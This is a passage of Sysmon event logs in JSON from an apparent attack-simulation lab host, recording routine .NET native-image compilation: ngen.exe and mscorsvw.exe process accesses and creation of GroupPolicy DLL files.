05:58:19.183","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010A9BA0C00}","TargetProcessId":"1324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6651,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:19.277\r\nProcessGuid: {A837DB8D-047B-5F25-0000-0010A9BA0C00}\r\nProcessId: 1324\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\52c-0\\Microsoft.GroupPolicy.Targeting.Interop.dll\r\nCreationUtcTime: 2020-08-01 05:58:19.277","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:19.277","ProcessGuid":"{A837DB8D-047B-5F25-0000-0010A9BA0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\52c-0\\Microsoft.GroupPolicy.Targeting.Interop.dll","CreationUtcTime":"2020-08-01 05:58:19.277","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6652,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.292\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001038BE0C00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.292","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001038BE0C00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6653,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.292\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001038BE0C00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.292","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001038BE0C00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6654,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.292\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001038BE0C00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.292","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001038BE0C00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6655,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.339\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010E3C10C00}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.339","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010E3C10C00}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6656,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.339\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010E3C10C00}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.339","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010E3C10C00}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6657,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.339\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010E3C10C00}\r\nTargetProcessId: 5084\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.339","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010E3C10C00}","TargetProcessId":"5084","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6658,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:19.527\r\nProcessGuid: {A837DB8D-047B-5F25-0000-0010E3C10C00}\r\nProcessId: 5084\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13dc-0\\Microsoft.GroupPolicy.Commands.dll\r\nCreationUtcTime: 2020-08-01 05:58:19.527","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:19.527","ProcessGuid":"{A837DB8D-047B-5F25-0000-0010E3C10C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13dc-0\\Microsoft.GroupPolicy.Commands.dll","CreationUtcTime":"2020-08-01 05:58:19.527","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6659,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.542\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-0010E4C50C00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.542","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-0010E4C50C00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Micr